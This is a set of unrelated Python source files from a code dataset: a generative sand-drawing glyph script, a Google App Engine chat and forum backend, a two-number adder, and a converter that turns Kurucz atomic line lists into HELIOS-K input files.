+{"seq_id":"228217426","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\nfrom numpy import linspace\nfrom numpy.random import random\n\n\nBACK = [1,1,1,1]\nFRONT = [0,0,0,0.0001]\n\nSIZE = 1400\nONE = 1./SIZE\nEDGE = 0.1\n\nGAMMA = 1.8\n\nGRAINS = 30\n\nGLYPH_HEIGHT = 0.02\nGLYPH_WIDTH = 0.005\n\nOFFSET_SIZE = 0.0012\n\nROW_NUM = 20\n\n\ndef get_position_generator(y):\n def position_generator():\n x = EDGE\n c = 0\n while x<1.0-EDGE:\n r = (0.8 + random()*1.2)*GLYPH_WIDTH\n new = False\n\n if c>2 and random()<0.15:\n r += GLYPH_WIDTH*2\n new = True\n c = 0\n\n x += r\n if not new:\n c += 1\n yield x, y, new\n return position_generator\n\n\ndef write(sand):\n from modules.glyphs import Glyphs\n # from modules.helpers import get_colors\n\n # colors = get_colors('../colors/ir.jpg')\n # nc = len(colors)\n\n G = Glyphs(\n GLYPH_HEIGHT,\n GLYPH_WIDTH,\n OFFSET_SIZE\n )\n\n i = 0\n for y in linspace(EDGE, 1.0-EDGE, ROW_NUM):\n print(y)\n for a, b in G.write(\n get_position_generator(y),\n gnum = 10,\n inum = 10000\n ):\n\n # rgba = colors[i%nc]+[0.0001]\n # sand.set_rgba(rgba)\n sand.paint_strokes(a, b, GRAINS)\n i += 1\n\n\ndef main():\n from sand import Sand\n from fn import Fn\n\n sand = Sand(SIZE)\n sand.set_bg(BACK)\n sand.set_rgba(FRONT)\n fn = Fn(prefix='./res/', postfix='.png')\n\n write(sand)\n # sand.set_bg(bw)\n name = fn.name()\n sand.write_to_png(name, GAMMA)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"451304347","text":"import webapp2\nimport json\nimport logging\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import channel\nfrom google.appengine.api import memcache\nfrom google.appengine.api import users\nfrom google.appengine.api import taskqueue\n\nfrom base import BaseHandler\n\nclass ChatRoom(ndb.Model):\n name = ndb.StringProperty(indexed=True)\n text = ndb.StringProperty(indexed=False)\n users = ndb.StringProperty(repeated=True)\n messages = ndb.StringProperty(repeated=True)\n\nclass UserRecord(ndb.Model):\n name = ndb.StringProperty(indexed=True)\n permitted_fora = ndb.KeyProperty(repeated=True)\n\nclass Forum(ndb.Model):\n name = ndb.StringProperty(indexed=True)\n threads = ndb.KeyProperty(repeated=True)\n\n def serialize(self):\n return {\n 'id': self.key.id(),\n 'name': self.name,\n 'threads': len(self.threads)\n }\n\nclass ForumThread(ndb.Model):\n forum = ndb.KeyProperty(indexed=True)\n comments = ndb.KeyProperty(repeated=True)\n text = ndb.StringProperty(indexed=False)\n poster = ndb.StringProperty(indexed=True)\n name = ndb.StringProperty(indexed=True)\n\n def serialize(self):\n return {\n 'name': self.name,\n 'id': self.key.id(),\n 'forum_id': self.forum.id(),\n 'poster': self.poster,\n 'excerpt': self.text[:50]\n }\n\n def dump(self):\n return {\n 'name': self.name,\n 'id': self.key.id(),\n 'forum_id': self.forum.id(),\n 'poster': self.poster,\n 'text': self.text,\n 'comments': [comment.get().serialize() for comment in self.comments]\n }\n\nclass ForumComment(ndb.Model):\n thread = ndb.KeyProperty(indexed=True)\n text = ndb.StringProperty(indexed=False)\n poster = ndb.StringProperty(indexed=True)\n\n def serialize(self):\n return {\n 'id': self.key.id(),\n 'thread_id': self.thread.id(),\n 'poster': self.poster,\n 'text': self.text\n }\n\nclass CreateRoomHandler(BaseHandler):\n def post(self):\n name = self.request.get('name')\n \n # Create the request room\n room = ChatRoom(\n name=name,\n users=[self.auth.get_user_by_session()['user_id'].decode()],\n messages=[],\n text=self.request.get('text')\n )\n room.put()\n \n # Tell the client the id of the newly-created room.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'room_id': room.key.id()\n }))\n\nclass JoinRoomHandler(BaseHandler):\n def get(self):\n # Look up the requested room:\n room_id = int(self.request.get('room_id'))\n room = ChatRoom.get_by_id(room_id)\n \n # Add the current user to it\n if self.auth.get_user_by_session()['user_id'].decode() not in room.users:\n room.users.append(self.auth.get_user_by_session()['user_id'].decode())\n room.put()\n\n # Inform the client of success.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'text': room.text,\n 'messages': [json.loads(message) for message in room.messages]\n }))\n\nclass ListRoomsHandler(BaseHandler):\n def get(self):\n # Fetch all the rooms\n rooms = ChatRoom.query().fetch()\n\n # Assemble a dictionary of proper properties\n rooms_json = []\n for room in rooms:\n rooms_json.append({\n 'name': room.name,\n 'id': room.key.id(),\n 'users': room.users\n })\n\n # Push them to the client\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'rooms': rooms_json\n }))\n\nclass RegisterHandler(BaseHandler):\n def get(self):\n # Create a Channels token. 
NOTE: requires uniqueness of emails; otherwise will fail!\n token = channel.create_channel(self.auth.get_user_by_session()['user_id'].decode())\n \n # Give it to the client\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'token': token\n }))\n\nclass SendMessageHandler(BaseHandler):\n def get(self):\n # Get the current user, for records\n user = self.auth.get_user_by_session()['user_id'].decode()\n\n # Get the chat room to which we want to broadcast\n room_id = int(self.request.get('room_id'))\n\n # Look that room up in our database\n room = ChatRoom.get_by_id(room_id)\n\n # Assemble the message we want to send:\n message = json.dumps({\n 'from': user,\n 'on': room.name,\n 'message': self.request.get('message'),\n 'start_position': int(self.request.get('start_position')),\n 'end_position': int(self.request.get('end_position'))\n })\n\n # Put this message into the history\n room.messages.append(message)\n room.put()\n \n # Broadcast the given message to\n # all such recipients\n for recipient in room.users:\n channel.send_message(recipient, message)\n \n # Inform client of success.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n }))\n\nclass ListForaHandler(BaseHandler):\n def get(self):\n user_dict = self.auth.get_user_by_session()\n\n # Get the current user's permitted fora\n user = self.auth.get_user_by_session()['user_id'].decode()\n\n user_record = UserRecord.get_by_id(user)\n \n # Get all the fora\n fora = [forum_key.get().serialize() for forum_key in user_record.permitted_fora]\n\n # Serve them to the client\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'fora': fora\n }))\n\nclass StartThreadHandler(BaseHandler):\n def post(self):\n # Identify the user, so we can record who posted this thread\n user = self.auth.get_user_by_session()['user_id'].decode()\n \n # Get this user's permitted fora\n user_record = UserRecord.get_by_id(user)\n \n # Get the forum they requested\n forum_id = int(self.request.get('forum_id'))\n forum = Forum.get_by_id(forum_id)\n \n # If this user is allowed to post\n # in this forum, start the new thread.\n if forum.key in user_record.permitted_fora:\n # Create and commit the thread\n thread = ForumThread(\n poster = user,\n text = self.request.get('text'),\n name = self.request.get('name'),\n forum = forum.key,\n comments = []\n )\n \n thread.put()\n \n # Update the forum's list of threads\n # and commit.\n forum.threads.append(thread.key)\n forum.put()\n \n # Inform the client of success.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'thread_id': thread.key.id()\n }))\n\n # Otherwise, inform the client that they are not\n # permitted to post in this forum.\n else:\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': False,\n 'errno': 13,\n 'message': 'You do not have permission to post on this forum.'\n }))\n\nclass ListThreadsHandler(BaseHandler):\n def get(self):\n # Look up the request forum\n forum_id = int(self.request.get('forum_id'))\n forum = Forum.get_by_id(forum_id)\n\n # Get all the threads in that forum\n threads = [thread.get().serialize() for thread in forum.threads]\n \n # Send them to the client.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'threads': threads\n }))\n\nclass 
ViewThreadHandler(BaseHandler):\n def get(self):\n # Look up the requested thread\n thread_id = int(self.request.get('thread_id'))\n thread = ForumThread.get_by_id(thread_id)\n\n # Return all the information about this thread to the client\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'thread': thread.dump()\n }))\n\nclass CommentHandler(BaseHandler):\n def post(self):\n # Identify the user, so we can record who posted this thread\n user = self.auth.get_user_by_session()['user_id'].decode()\n\n # Get this user's permitted fora\n user_record = UserRecord.get_by_id(user)\n \n # Get the forum they requested\n thread_id = int(self.request.get('thread_id'))\n thread = ForumThread.get_by_id(thread_id)\n \n # If this user is allowed to post\n # in this forum, post the comment.\n if thread.forum in user_record.permitted_fora:\n # Create and commit the comment\n comment = ForumComment(\n poster = user,\n text = self.request.get('text'),\n thread = thread.key\n )\n\n comment.put()\n \n # Update this thread's list of comments\n # and commit.\n thread.comments.append(comment.key)\n thread.put()\n \n # Inform the client of success.\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'comment_id': comment.key.id()\n }))\n\n # Otherwise, inform the client that they are not\n # permitted to post in this forum.\n else:\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': False,\n 'errno': 13,\n 'message': 'You do not have permission to post on this thread.'\n }))\n\nclass GenerateForaHandler(BaseHandler):\n def get(self):\n # Read out the courses\n courses_file = open('courses.json')\n courses = json.load(courses_file)\n courses_file.close()\n \n # Create and insert a forum for each course\n for course_string in courses:\n taskqueue.add(url='/generate_forum_', params={'name': courses[course_string]['ClassCode'], 'students': json.dumps(courses[course_string]['Students'])})\n \n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True,\n 'queued': len(courses)\n }))\n\nclass GenerateForumHandler(BaseHandler):\n def post(self):\n # Create and commit the forum\n forum = Forum(\n name = self.request.get('name'),\n threads = []\n )\n forum.put()\n\n # Add the forum to the permitted subfora for\n # each user who can see it\n students = json.loads(self.request.get('students'))\n for student in students:\n user = UserRecord.get_by_id(student)\n\n # Create this user if it does not already exist\n if user is None:\n user = UserRecord(\n id = student,\n permitted_fora = []\n )\n # Finish\n user.permitted_fora.append(forum.key)\n user.put()\n \n logging.info('Completed course ' + self.request.get('name'))\n\n self.response.headers['Content-Type'] = 'application/json'\n self.response.write(json.dumps({\n 'success': True\n }))\n","sub_path":"handlers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"436474486","text":"#Stephen Barton Jr\r\n#Python Programming, 2 numbers\r\n#22 APR 2019\r\n\r\ndef main():\r\n answer = 1\r\n while answer == 1:\r\n num1 = int(input(\"Enter a number: \"))\r\n num2 = int(input(\"Enter a second number: \"))\r\n total = num1 + num2\r\n print(num1,\"+\",num2,\"equals\",total)\r\n print(\"Do you want to perform this operation again? 1 for yes, anything else for no: \")\r\n answer = int(input())\r\n if answer != 1:\r\n break\r\n\r\nmain()\r\n","sub_path":"Python/loops/add2.py","file_name":"add2.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"430027681","text":"import numpy as np\nimport math\nimport struct\nimport os\nimport argparse\n\n# This script downloads the Kurucz gfnew files and produces the binary and *.param files for HELIOS-K\n\n# Date: May 2019\n# Author: Simon Grimm\n\n\n\n#choose if the file contains wavenumber or not\nWavenumber = 1\t\t\t#1: Wavenumber, 2: vacuum wavelength, 3: air based wavelenght\n\n\n#filename=\"gfall08oct17.dat\"\n#filename=\"gfallvac08oct17.dat\"\n\nfilename=\"gfallwn08oct17.dat\"\n#filename=\"gf2600.all\"\n#filename=\"hyper1900.all\"\n\n\n\nelt0=[\n[ 100, \"H\" , 1.00794],\n[ 200, \"He\" , 4.002602],\n[ 300, \"Li\" , 6.941],\n[ 400, \"Be\" , 9.012182],\n[ 500, \"B\" , 10.811],\n[ 600, \"C\" , 12.011],\n[ 700, \"N\" , 14.00674],\n[ 800, \"O\" , 15.9994],\n[ 900, \"F\" , 18.9984032],\n[ 1000, \"Ne\" , 20.1797],\n[ 1100, \"Na\" , 22.989768],\n[ 1200, \"Mg\" , 24.3050],\n[ 1300, \"Al\" , 26.981539],\n[ 1400, \"Si\" , 28.0855],\n[ 1500, \"P\" , 30.973762],\n[ 1600, \"S\" , 32.066],\n[ 1700, \"Cl\" , 35.4527],\n[ 1800, \"Ar\" , 39.948],\n[ 1900, \"K\" , 39.0983],\n[ 2000, \"Ca\" , 40.078],\n[ 2100, \"Sc\" , 44.955910],\n[ 2200, \"Ti\" , 47.88],\n[ 2300, \"V\" , 50.9415],\n[ 2400, \"Cr\" , 51.9961],\n[ 2500, \"Mn\" , 54.93805],\n[ 2600, \"Fe\" , 55.847],\n[ 2700, \"Co\" , 58.93320],\n[ 2800, \"Ni\" , 58.6934],\n[ 2900, \"Cu\" , 63.546],\n[ 3000, \"Zn\" , 65.39],\n[ 3100, \"Ga\" , 69.723],\n[ 3200, \"Ge\" , 72.61],\n[ 3300, \"As\" , 74.92159],\n[ 3400, \"Se\" , 78.96],\n[ 3500, \"Br\" , 79.904],\n[ 3600, \"Kr\" , 83.80],\n[ 3700, \"Rb\" , 85.4678],\n[ 3800, \"Sr\" , 87.62],\n[ 3900, \"Y\" , 88.90585],\n[ 4000, \"Zr\" , 91.224],\n[ 4100, \"Nb\" , 92.90638],\n[ 4200, \"Mo\" , 95.94],\n[ 4300, \"Tc\" , 97.9072],\n[ 4400, \"Ru\" ,101.07],\n[ 4500, \"Rh\" ,102.90550],\n[ 4600, \"Pd\" ,106.42],\n[ 4700, \"Ag\" ,107.8682],\n[ 4800, \"Cd\" ,112.411],\n[ 4900, \"In\" ,114.818],\n[ 5000, \"Sn\" ,118.710],\n[ 5100, \"Sb\" ,121.757],\n[ 5200, \"Te\" ,127.60],\n[ 5300, \"I\" ,126.90447],\n[ 5400, \"Xe\" ,131.29],\n[ 5500, \"Cs\" ,132.90543],\n[ 5600, \"Ba\" ,137.327],\n[ 5700, \"La\" ,138.9055],\n[ 5800, \"Ce\" ,140.115],\n[ 5900, \"Pr\" ,140.90765],\n[ 6000, \"Nd\" ,144.24],\n[ 6100, \"Pm\" ,144.9127],\n[ 6200, \"Sm\" ,150.36],\n[ 6300, \"Eu\" ,151.965],\n[ 6400, \"Gd\" ,157.25],\n[ 6500, \"Tb\" ,158.92534],\n[ 6600, \"Dy\" ,162.50],\n[ 6700, \"Ho\" ,164.93032],\n[ 6800, \"Er\" ,167.26],\n[ 6900, \"Tm\" ,168.93421],\n[ 7000, \"Yb\" ,173.04],\n[ 7100, \"Lu\" ,174.967],\n[ 7200, \"Hf\" ,178.49],\n[ 7300, \"Ta\" ,180.9479],\n[ 7400, \"W\" ,183.84],\n[ 7500, \"Re\" ,186.207],\n[ 7600, \"Os\" ,190.23],\n[ 7700, \"Ir\" ,192.22],\n[ 7800, \"Pt\" ,195.08],\n[ 7900, \"Au\" ,196.96654],\n[ 8000, \"Hg\" ,200.59],\n[ 8100, \"Tl\" ,204.3833],\n[ 8200, \"Pb\" ,207.2],\n[ 8300, \"Bi\" ,208.98037],\n[ 8400, \"Po\" ,208.9824],\n[ 8500, \"At\" ,209.9871],\n[ 8600, \"Rn\" ,222.0176],\n[ 8700, \"Fr\" ,223.0197],\n[ 8800, \"Ra\" ,226.0254],\n[ 8900, \"Ac\" ,227.0278],\n[ 9000, \"Th\" ,232.0381],\n[ 9100, \"Pa\" ,231.03588],\n[ 9200, \"U\" ,238.0289],\n[ 9300, \"Np\" ,237.0482],\n[ 9400, \"Pu\" ,244.0642],\n[ 9500, \"Am\" ,243.0614],\n[ 9600, \"Cu\" ,247.0703],\n[ 9700, \"Bk\" ,247.0703],\n[ 9800, \"Cf\" ,251.0796],\n[ 9900, \"Es\" ,252.0830],\n[10000, \"Fm\" ,257.0951],\n[10100, \"Md\" ,258.0984],\n[10200, \"No\" ,259.1011],\n[10300, \"Lr\" ,262.1098],\n[10400, \"Rf\" ,261.1089],\n[10500, \"Db\" ,262.1144],\n[10600, \"Sg\" ,263.1186],\n[10700, \"Bh\" ,264.12],\n[10800, \"Hs\" ,265.1306],\n[10900, \"Mt\" 
,268.00],\n[11000, \"Ds\" ,268.00],\n[11100, \"Rg\" ,272.00],\n[11200, \"Cn\" ,277.00],\n[11300, \"Uut\" ,0.00],\n[11400, \"Fl\" ,289.00],\n[11500, \"Uup\" ,0.00],\n[11600, \"Lv\" ,289.00],\n[11700, \"Uus\" ,294.00],\n[11800, \"Uuo\" ,293.00]\n]\n\n\n\n\ndef main(Download, Z, I, printA):\n\n\n\tif(Z == -1 and I == -1):\n\t\t# all species in Z and I\n\t\tfor i in range(0,100):\n\t\t\tfor j in range(0,3):\n\t\t\t\tprocessLineList(i, j, Download, printA)\n\n\tif(Z == -1 and I > -1):\n\t\t# all species in Z\n\t\tfor i in range(0,100):\n\t\t\tprocessLineList(i, I, Download, printA)\n\n\tif(Z > -1 and I == -1):\n\t\t# all species in I\n\t\tfor j in range(0,3):\n\t\t\tprocessLineList(Z - 1, j, Download, printA)\n\n\tif(Z > -1 and I > -1):\n\t\tprocessLineList(Z - 1, I, Download, printA)\n\t\n\ndef processLineList(i, j, Download, printA):\n\t# i element id 0 to 99\n\t# j ion id 0 to 2\n\n\tel = list(elt0[i])\t#work on a copy so that elt0 is not mutated between calls\n\tif(j==1):\n\t\tel[1] = el[1] + \"+\"\n\t\tel[0] = el[0] + 1\n\tif(j==2):\n\t\tel[1] = el[1] + \"2\"\n\t\tel[0] = el[0] + 1\n\n\tels = \"% 6.2f\" % (el[0] / 100.0)\n\n\tname =\"gfnew%.4d\" % el[0]\n\t#name =\"hyper%.4d\" % el[0]\n\tNISTname =\"NIST%.4d\" % el[0]\n\n\toutname = \"%s.bin\" % name\n\tpfname = \"%s.pf\" % name\n\tmass = el[2]\n\t\n\tprint(el[0], els, el[1], outname, mass)\n\n\tif(Download == 1):\n\t\t#download file\n\n\t\texists = os.path.isfile(\"%s\" % filename)\n\t\tif(exists == 0):\n\t\t\tcom = \"wget http://kurucz.harvard.edu/linelists/gfnew/%s\" % filename\n\t\t\tprint(com)\n\t\t\tos.system(com)\n\n\t\t#download partition function\n\n\t\texists = os.path.isfile(\"partfn%.4d.dat\" % el[0])\n\t\tif(exists == 0):\n\n\t\t\tcom = \"wget http://kurucz.harvard.edu/atoms/%.4d/partfn%.4d.dat\" % (el[0], el[0])\n\t\t\tprint(com)\n\t\t\tos.system(com)\n\n\t\tif(exists == 0):\n\t\t\texists = os.path.isfile(\"partfn%.4dz.dat\" % el[0])\n\t\t\tcom = \"wget http://kurucz.harvard.edu/atoms/%.4d/partfn%.4dz.dat\" % (el[0], el[0])\n\t\t\tprint(com)\n\t\t\tos.system(com)\n\t\n\n\toutput_file = open(outname,\"wb\")\n\tpf_filename = \"partfn%.4d.dat\" % el[0]\n\n\n\tnumax = 0.0\n\tnl = 0\n\tLabelLOld =\"\"\n\tLabelUOld =\"\"\n\tgUPOld = -1\n\tgLowOld = -1\n\tELowOld = -1.0\n\tEUPOld = -1.0\n\n\n\tif(printA == 1):\n\t\tAfile = open(\"gfall_A%02d%02d.dat\" % (Z, I), \"w\")\n\n\twith open(filename) as f:\n\t\tline = f.readlines()\n\n\t\tfor ii in range(len(line)):\n\t\t\tl = line[ii]\n\n\t\t\t#E in cm^-1\n\t\t\t#atomic line list format\n\t\t\tif(Wavenumber == 1):\n\t\t\t\twn = float(l[0:11])\n\t\t\t\twl = 1.0E7/wn\t\t#wavelength in nm\n\t\t\tif(Wavenumber == 2):\n\t\t\t\twl = float(l[0:11])\t#wavelength in nm\n\t\t\t\twn = 1.0E7/wl\n\t\t\tif(Wavenumber == 3):\n\t\t\t\twlAir = float(l[0:11])\t#wavelength in nm\n\n\n\t\t\tloggf = float(l[11:18])\n\t\t\telement = l[18:24]\n\t\t\tELow = float(l[24:36])\n\t\t\tJLow = float(l[36:41])\n\t\t\tLabelL = l[42:52]\n\t\t\tEUP = float(l[52:64])\n\t\t\tJUP = float(l[64:69])\n\t\t\tLabelU = l[70:80]\n\t\t\tGammaR = l[80:86]\n\t\t\tisotope = l[106:109]\n\t\t\thyperFineFraction = l[109:115]\n\t\t\tISOFraction = l[118:124]\n\t\t\thyperShiftL = l[124:129]\n\t\t\thyperShiftU = l[129:134]\n\n\t\t\t#blank fixed-width fields default to zero\n\t\t\tif(isotope.strip() == \"\"):\n\t\t\t\tisotope = \" 0\"\n\t\t\tif(GammaR.strip() == \"\"):\n\t\t\t\tGammaR = \" 0\"\n\t\t\tif(hyperShiftL.strip() == \"\"):\n\t\t\t\thyperShiftL = \" 0\"\n\t\t\tif(hyperShiftU.strip() == \"\"):\n\t\t\t\thyperShiftU = \" 0\"\n\t\t\tif(hyperFineFraction.strip() == \"\" or len(hyperFineFraction) < 2):\n\t\t\t\thyperFineFraction = \" 0\"\n\t\t\tif(ISOFraction.strip() == \"\"):\n\t\t\t\tISOFraction = \" 0\"\n\t\t\t\n\t\t\tGammaR = float(GammaR)\n\t\t\thyperShiftL = float(hyperShiftL)\n\t\t\thyperShiftU = float(hyperShiftU)\n\t\t\thyperFineFraction = float(hyperFineFraction)\n\t\t\tISOFraction = float(ISOFraction)\n\n\t\t\te = 4.80320425E-10 #electron charge in cgs units [statcoulomb = cm^(3/2) g^(1/2) s^-1]\n\t\t\tc = 2.99792458E10 #Speed of light cm/s\n\t\t\tme = 9.1093835611E-28 #mass of electron in g\n\t\t\tNA = 6.0221412927e23\t#Avogadro Constant 1/mol\n\n\n\t\t\tELow = abs(ELow)\n\t\t\tEUP = abs(EUP)\n\n\n\t\t\t#sometimes ELow is larger than EUP, so swap the levels\n\t\t\t\n\t\t\tif(ELow > EUP):\n\t\t\t\tt = EUP\n\t\t\t\tEUP = ELow\n\t\t\t\tELow = t\n\n\t\t\t\tt = JUP\n\t\t\t\tJUP = JLow\n\t\t\t\tJLow = t\n\t\t\t\t\n\t\t\t\tt = hyperShiftU\n\t\t\t\thyperShiftU = hyperShiftL\n\t\t\t\thyperShiftL = t\n\n\t\t\t\tt = LabelU\n\t\t\t\tLabelU = LabelL\n\t\t\t\tLabelL = t\n\t\t\t\t\n\t\t\t\t#if(element == els):\n\t\t\t\t#\tprint(\"swap energies\")\n\t\t\t\t\n\t\t\t#convert air wavelength to vacuum wavelength\n\t\t\t#http://www.astro.uu.se/valdwiki/Air-to-vacuum%20conversion\n\n\t\t\tif(Wavenumber == 3):\n\t\t\t\tif(wlAir > 200):\n\t\t\t\t\twlAir = wlAir * 10 #convert nm to Angstrom\n\t\t\t\t\ts = 10000.0 / wlAir\n\t\t\t\t\tn = 1.0 + 0.00008336624212083 + 0.02408926869968 / (130.1065924522 - s*s) + 0.0001599740894897 / (38.92568793293 - s*s)\n\t\t\t\t\twl = wlAir * n\n\t\t\t\t\twl = wl * 0.1 #convert Angstrom to nm\n\t\t\t\telse:\n\t\t\t\t\twl = wlAir\n\t\t\t\twn = 1.0E7/wl\t\t#wavenumber in cm^-1\n\t\t\t\t\n\n\t\t\tgUP = 2 * JUP + 1\n\t\t\tgLow = 2 * JLow + 1\n\n\t\t\tif(element == els):\n\t\t\t\tA = 8.0 * math.pi * wn * wn * (10.0**loggf) / gUP * math.pi * e * e / (me * c)\n\t\t\t\tgamma = 2.223e13 / (wl * wl)\n\n\t\t\t\tsameLabel = 0\n\t\t\t\tif(LabelL == LabelLOld and LabelU == LabelUOld and gUP == gUPOld and gLow == gLowOld and ELow == ELowOld and EUP == EUPOld):\n\t\t\t\t\tsameLabel = 1\n\t\t\t\t\n\t\t\t\tif(sameLabel == 0):\n\t\t\t\t\tHF = 10.0**hyperFineFraction\n\t\t\t\telse:\n\t\t\t\t\tHF += 10.0**hyperFineFraction\n\n\t\t\t\t\t\n\t\t\t\t'''\n\t\t\t\t# use this block to filter out hyperfine splits\n\t\t\t\t###################################\n\t\t\t\thyperFineFraction = 0.0\n\t\t\t\tISOFraction = 0.0\n\t\t\t\twn += 0.001 * hyperShiftL\n\t\t\t\twn -= 0.001 * hyperShiftU\n\t\t\t\thyperShiftU = 0.0\n\t\t\t\thyperShiftL = 0.0\n\t\t\t\tif(sameLabel == 1):\n\t\t\t\t\tcontinue\n\t\t\t\t##################################\n\t\t\t\t'''\n\n\t\t\t\t#print(element, wn, isotope, GammaR, 10.0**GammaR, A, gamma)\n\t\t\t\t#print(element, wn, isotope, ELow, EUP, gLow, gUP, 10.0**loggf, 10.0**hyperFineFraction, 10.0**ISOFraction, LabelL, LabelU, hyperShiftL, hyperShiftU, sameLabel, HF)\n\n\t\t\t\t#if(HF > 1.001):\n\t\t\t\t#\tprint(\"***\", element, wn, isotope, HF)\n\n\n\t\t\t\tLabelLOld = LabelL\n\t\t\t\tLabelUOld = LabelU\n\t\t\t\tgUPOld = gUP\n\t\t\t\tgLowOld = gLow\n\t\t\t\tEUPOld = EUP\n\t\t\t\tELowOld = ELow\n\n\t\t\t\t\n\t\t\t#this must be done after the Hyperfine fraction filtering. (Old value comparison)\n\t\t\tELow += 0.001 * hyperShiftL\n\t\t\tEUP += 0.001 * hyperShiftU\n\n\n\t\t\tisotope = int(isotope)\n\t\t\n\t\t\tif(element == els):\n\t\t\t\tnl = nl + 1\n\n\t\t\t\tnumax = max(numax, wn)\n\n\t\t\t\tS = math.pi * e * e * 10.0**loggf * NA / (c * c * me * mass) * 10.0**hyperFineFraction * 10.0**ISOFraction\n\n\t\t\t\tA = 8.0 * math.pi * wn * wn * 10.0**loggf / gUP * math.pi * e * e / (me * c)\n\t\t\t\n\t\t\t\tif(printA == 1):\n\t\t\t\t\tprint(i, wn, A, ELow, gUP, Z, mass, file = Afile)\n\t\t\t\t#print(wn, 1.0E7/wn, loggf, ELow, EUP, JLow, JUP, GammaR, isotope, element, mass, 10.0**GammaR, A, 10.0**hyperFineFraction, 10.0**ISOFraction)\n\n\n\t\t\t\ts = struct.pack('d', wn)\n\t\t\t\toutput_file.write(s)\n\t\t\t\ts = struct.pack('d', S)\n\t\t\t\toutput_file.write(s)\n\t\t\t\ts = struct.pack('d', ELow)\n\t\t\t\toutput_file.write(s)\n\t\t\t\ts = struct.pack('d', 0.0)\n\t\t\t\toutput_file.write(s)\n\t\t\t\ts = struct.pack('d', (10**GammaR))\n\t\t\t\toutput_file.write(s)\n\n\tprint(\" Lines:\",nl, end='')\n\n\toutput_file.close()\n\n\tpfile = 0\n\tif(os.path.isfile(pf_filename)):\n\t\t#print(\" \", pf_filename)\n\t\tpf_file = open(pfname,\"w\")\n\t\tT, Q = np.loadtxt(pf_filename, unpack=True, usecols = (2,3), skiprows=3)\n\t\tfor ii in range(len(T)):\n\t\t\tpf_file.write(\"%g %g\\n\" % (T[ii], Q[ii]))\n\t\tpf_file.close()\n\t\tpfile = 1\n\n\telse:\n\t\tprint(\" ------- NIST\")\n\n\tprintCode = 1\n\tif(nl > 0 and printCode == 1):\n\t\tf = open(\"%s.param\" % name,'w')\n\n\t\tprint(\"Database = 30\", file = f)\n\t\tprint(\"Molecule number = %d\" % el[0], file = f)\n\t\tprint(\"Name = %s\" % name, file = f)\n\t\tprint(\"Number of Isotopes = 1\", file = f)\n\t\tprint(\"#Id Abundance Q(296K) g Molar Mass(g) partition file :\", file = f)\n\t\tif(pfile == 1):\n\t\t\tprint(\"0 1.0 0.0 0 %s %s.pf\" % (mass, name), file = f)\n\t\telse:\n\t\t\tprint(\"0 1.0 0.0 0 %s %s.pf\" % (mass, NISTname), file = f)\n\t\tprint(\"Number of columns in partition File = 2\", file = f)\n\t\tprint(\"Number of line/transition files = 1\", file = f)\n\t\tprint(\"Number of lines per file :\", file = f)\n\t\tprint(\"%d\" % nl, file = f)\n\t\tprint(\"Line file limits :\", file = f)\n\t\tprint(\"0\", file = f)\n\t\tprint(\"%d\" % (int(numax)+1), file = f)\n\t\tprint(\"#ExoMol :\", file = f)\n\t\tprint(\"Number of states = 0\", file = f)\n\t\tprint(\"Number of columns in transition files = 0\", file = f)\n\t\tprint(\"Default value of Lorentzian half-width for all lines = 0.0\", file = f)\n\t\tprint(\"Default value of temperature exponent for all lines = 0.0\", file = f)\n\t\tprint(\"Version = %s\" % filename, file = f)\n\n\t\tf.close()\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('-D', '--Download', type=int,\n\t\thelp='Download the files', default = 0)\n\tparser.add_argument('-Z', '--Z', type=int,\n\t\thelp='Z', default = -1)\n\tparser.add_argument('-I', '--I', type=int,\n\t\thelp='I', default = -1)\n\tparser.add_argument('-printA', '--printA', type=int,\n\t\thelp='print A to file', default = 0)\n\n\n\targs = parser.parse_args()\n\tDownload = args.Download\n\tZ = args.Z\n\tI = args.I\n\tprintA = args.printA\n\n\tprint(\"Download: %d, Z:%d, I: %d\" % (Download, Z, I))\n\n\tmain(Download, Z, I, printA)\n\n","sub_path":"Kurucz2.py","file_name":"Kurucz2.py","file_ext":"py","file_size_in_byte":12044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
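A standalone sanity check of the air-to-vacuum wavelength conversion used in the record above. The refraction-index coefficients are copied from the script; the function name and the test value are illustrative only:

def air_to_vacuum_nm(wl_air_nm):
    # Below ~200 nm the script leaves the wavelength unchanged.
    if wl_air_nm <= 200.0:
        return wl_air_nm
    wl_air = wl_air_nm * 10.0        # nm -> Angstrom
    s = 10000.0 / wl_air             # inverse wavelength in 1/micron
    n = (1.0 + 0.00008336624212083
         + 0.02408926869968 / (130.1065924522 - s * s)
         + 0.0001599740894897 / (38.92568793293 - s * s))
    return wl_air * n * 0.1          # back to nm, now in vacuum

print(air_to_vacuum_nm(500.0))       # ~500.14 nm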
